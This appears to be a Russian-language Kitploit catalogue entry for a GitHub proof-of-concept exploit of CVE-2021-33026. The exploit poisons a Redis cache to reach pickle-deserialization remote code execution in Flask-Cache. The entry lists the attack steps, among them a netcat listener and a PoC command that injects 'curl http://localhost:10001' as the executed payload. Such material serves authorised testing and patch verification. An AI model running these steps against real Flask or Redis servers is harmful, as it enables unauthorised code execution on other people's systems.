Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
FlaskCache_CVE-2021-33026_POC — Эксплойт для подтверждения концепции (PoC) для уязвимости CVE-2021-33026, демонстрирующий отравление кэша Redis в Flask-Cache через десериализацию pickle для достижения удаленного выполнения кода. | Kitploit
Инструменты/GitHubGitHub/agilevatester/flaskcache_cve-2021-33026_poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubagilevatester/flaskcache_cve-2021-33026_poc

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

FlaskCache_CVE-2021-33026_POC

Эксплойт для подтверждения концепции (PoC) для уязвимости CVE-2021-33026, демонстрирующий отравление кэша Redis в Flask-Cache через десериализацию pickle для достижения удаленного выполнения кода.

Репозиторий
17 месяцев назадЕщё не проверено

Pickle Serialization Remote Code Execution - Redis Poisoning PoC Exploit


Проверьте, что сервер Redis запущен

redis-cli -h 127.0.0.1 -p 6379 ping

redis-cli keys *

redis-cli get [Keyid]


Запустите прослушивание netcat на порту 10001:

nc -nvlp 10001


Настройка окружения для Flask Chache

python -m venv venv_flask_cache_<lib_ver>

source venv_flask_cache_<lib_ver>\scripts\activate

pip install -r <requirement.txt>

Настройка окружения для Flask Chache 2.3.0

Запустите Flask приложение и создайте ключ кэша:

flask run

curl --header "Content-Type: application/json" --request POST --data {"key":"Cachelib_2.3"} http://localhost:5000/cache/new

Получите значение ключа кэша из Flask приложения

curl --request GET http://localhost:5000/cache/[key]

Эксплуатация Flask Cache путем отравления Redis Cache:

cve-2021-33026_PoC.py --rhost 127.0.0.1 --rport 5000 --cacheType redis --cmd "curl http://localhost:10001" --id 41685a90-434e-4d70-9a08-35b78025e09a

Скачать инструмент